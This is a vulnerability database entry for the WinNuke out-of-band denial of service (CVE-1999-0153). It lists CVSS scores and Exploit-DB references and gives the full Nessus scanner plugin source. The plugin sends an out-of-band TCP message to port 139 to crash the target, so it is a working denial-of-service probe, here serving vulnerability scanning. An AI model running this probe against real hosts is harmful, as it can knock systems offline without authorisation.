Vulnerabilities > CVE-1999-0153

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
microsoft
sco
nessus
exploit available

Summary

Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke.

Vulnerable Configurations

Part Description Count
OS
Microsoft
3
OS
Sco
1

Exploit-Db

  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (1). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20437
    last seen2016-02-02
    modified1997-07-05
    published1997-07-05
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20437/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 1
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (4). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20440
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reportermaddog and lerper
    sourcehttps://www.exploit-db.com/download/20440/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 4
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (2). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20438
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20438/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 2
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (3). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20439
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20439/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 3

Nessus

NASL familyDenial of Service
NASL idWINNUKE.NASL
descriptionIt was possible to crash the remote host using the 'Winnuke' attack, that is, by sending an out-of-band (OOB) message to TCP port 139.
last seen2020-06-01
modified2020-06-02
plugin id10314
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10314
titleMultiple Vendor Out Of Band Data DoS (WinNuke)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration block: when the engine loads the plugin with `description`
# set, only the metadata below is declared and the script leaves through the
# exit(0) at the end of the block, before any traffic is sent.
if (description)
{
  script_id(10314);
  script_version("1.30");
  script_cvs_date("Date: 2018/08/06 14:03:14");

  # Cross-references used to correlate this finding with advisories.
  script_cve_id("CVE-1999-0153");
  script_bugtraq_id(2010);

  script_name(english:"Multiple Vendor Out Of Band Data DoS (WinNuke)");
  script_summary(english:"MSG_OOB against the remote host");

  script_set_attribute(attribute:"synopsis", value:"The remote service is vulnerable to denial of service.");
  script_set_attribute(attribute:"description", value:
"It was possible to crash the remote host using the 'Winnuke' attack,
that is to send an OOB message to this port.

An attacker may use this flaw to make this host crash continuously,
preventing the system from working properly.");
  script_set_attribute(attribute:"see_also", value:"http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-10/att-0333/01-winnuke.c");
  # NOTE(review): the solution field holds only a link to the vendor KB
  # article; the remediation itself is not stated in the plugin output.
  script_set_attribute(attribute:"solution", value:"http://support.microsoft.com/default.aspx?scid=kb;EN-US;179129");
  # CVSS v2 base: reachable over the network, low complexity, no
  # authentication, availability impact only (partial).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  # CVSS v2 temporal: proof-of-concept exploit code (E:POC), official fix
  # available (RL:OF), report confirmed (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"1997/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  # Flagged as a potential finding: the result is inferred from the host
  # going quiet after the probe, not from a version or patch check.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_KILL_HOST: the check can take the target down. Scanners normally skip
  # this category while safe checks are enabled; confirm the scan policy
  # before allowing it against production hosts.
  script_category(ACT_KILL_HOST);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"Denial of Service");

  # Scheduling constraints: run only for paranoid reports and only when
  # TCP port 139 is listed as a required port for the target.
  script_require_keys("Settings/ParanoidReport");
  script_require_ports(139);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

# Paranoia gate: below level 2 the plugin stops here and records
# AUDIT_PARANOID instead of probing the host.
if (report_paranoia < 2)
  audit(AUDIT_PARANOID);

port = 139;

# Nothing to test when the port is not open or the connection fails.
if (!get_port_state(port))
  exit(0);

sock = open_sock_tcp(port);
if (!sock)
  exit(0);

# start_denial()/end_denial() bracket the probe; the result of end_denial()
# is treated as "host still answers". A host that stops responding for an
# unrelated reason inside this window is reported the same way, which is
# likely why the plugin is restricted to paranoid reports.
start_denial();
payload = "you are dead";
send(socket:sock, data:payload, option:MSG_OOB);
close(sock);
still_up = end_denial();

if (still_up)
  exit(0);

# Host no longer answers: raise the finding on the tested port and record
# Host/dead in the knowledge base (presumably so later plugins can take the
# outage into account; verify against the consumers of that key).
security_warning(port);
set_kb_item(name:"Host/dead", value:TRUE);